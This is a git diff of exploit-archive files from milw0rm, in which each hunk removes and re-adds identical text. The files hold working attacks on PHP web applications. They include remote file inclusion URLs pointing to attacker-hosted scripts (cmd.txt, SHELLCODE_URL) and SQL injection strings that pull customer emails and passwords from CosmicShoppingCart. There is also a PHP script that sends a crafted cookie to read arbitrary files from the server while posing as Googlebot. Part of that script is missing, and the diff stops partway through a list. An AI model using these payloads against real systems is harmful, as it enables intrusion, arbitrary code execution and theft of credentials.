+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1846.txt b/platforms/php/webapps/1846.txt
index 07bf29cad..632354e25 100755
--- a/platforms/php/webapps/1846.txt
+++ b/platforms/php/webapps/1846.txt
@@ -1,10 +1,10 @@
-Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
-Succesful exploitation needs register_globals on & allow url_fopen on
-GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
-EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
-# nukedx.com [2006-05-28]
-
-# milw0rm.com [2006-05-28]
+Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
+Succesful exploitation needs register_globals on & allow url_fopen on
+GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
+EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
+# nukedx.com [2006-05-28]
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1847.txt b/platforms/php/webapps/1847.txt
index 5fb62c69c..137c2d9ca 100755
--- a/platforms/php/webapps/1847.txt
+++ b/platforms/php/webapps/1847.txt
@@ -1,12 +1,12 @@
-Software: CosmicShoppingCart (www.cosmicphp.com)
-Risk: Medium
-Discovered by: Vympel (Marcelo Almeida)
-Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.
-
-SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
-
-Examples:
-cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
-cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
-
-# milw0rm.com [2006-05-28]
+Software: CosmicShoppingCart (www.cosmicphp.com)
+Risk: Medium
+Discovered by: Vympel (Marcelo Almeida)
+Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.
+
+SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
+
+Examples:
+cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
+cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/php/webapps/1848.txt b/platforms/php/webapps/1848.txt
index 1d97ad3d6..76c1823f7 100755
--- a/platforms/php/webapps/1848.txt
+++ b/platforms/php/webapps/1848.txt
@@ -1,28 +1,28 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
-# Script site: http://www.fastpublish.org
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-
-http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-29]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
+# Script site: http://www.fastpublish.org
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+
+http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-29]
diff --git a/platforms/php/webapps/1851.txt b/platforms/php/webapps/1851.txt
index d0bfb7bc8..8fbec21c3 100755
--- a/platforms/php/webapps/1851.txt
+++ b/platforms/php/webapps/1851.txt
@@ -1,7 +1,7 @@
-# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
-# Script site: http://sourceforge.net/projects/gnopaste
-# made by SmokeZ (smoke.hes@gmail.com)
-
-http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?
-
-# milw0rm.com [2006-05-30]
+# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
+# Script site: http://sourceforge.net/projects/gnopaste
+# made by SmokeZ (smoke.hes@gmail.com)
+
+http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?
+
+# milw0rm.com [2006-05-30]
diff --git a/platforms/php/webapps/1853.php b/platforms/php/webapps/1853.php
index d2a3c8034..f98592ed6 100755
--- a/platforms/php/webapps/1853.php
+++ b/platforms/php/webapps/1853.php
@@ -1,137 +1,137 @@
-#!/usr/bin/php -q -d short_open_tag=on
- 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$path_to_file=$argv[3];
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."randompic.php HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :)
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-echo $html;
-?>
-
-# milw0rm.com [2006-05-31]
+#!/usr/bin/php -q -d short_open_tag=on
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$path_to_file=$argv[3];
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."randompic.php HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :)
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+echo $html;
+?>
+
+# milw0rm.com [2006-05-31]
diff --git a/platforms/php/webapps/1854.txt b/platforms/php/webapps/1854.txt
index 4e546e1b0..d77c36e55 100755
--- a/platforms/php/webapps/1854.txt
+++ b/platforms/php/webapps/1854.txt
@@ -1,21 +1,21 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ottoman_v1_1_2 - Remote File Include Vulnerabilities
-# Script site: http://prdownloads.sourceforge.net/ottoman/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-
-http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
-http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
-http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-31]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ottoman_v1_1_2 - Remote File Include Vulnerabilities
+# Script site: http://prdownloads.sourceforge.net/ottoman/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+
+http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
+http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
+http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-31]
diff --git a/platforms/php/webapps/1855.txt b/platforms/php/webapps/1855.txt
index d4014b894..9b98c2b65 100755
--- a/platforms/php/webapps/1855.txt
+++ b/platforms/php/webapps/1855.txt
@@ -1,95 +1,95 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
-# Script site: http://www.metajour.org
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#
-##################################################################
-expl:
-
-http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-31]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
+# Script site: http://www.metajour.org
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#
+##################################################################
+expl:
+
+http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
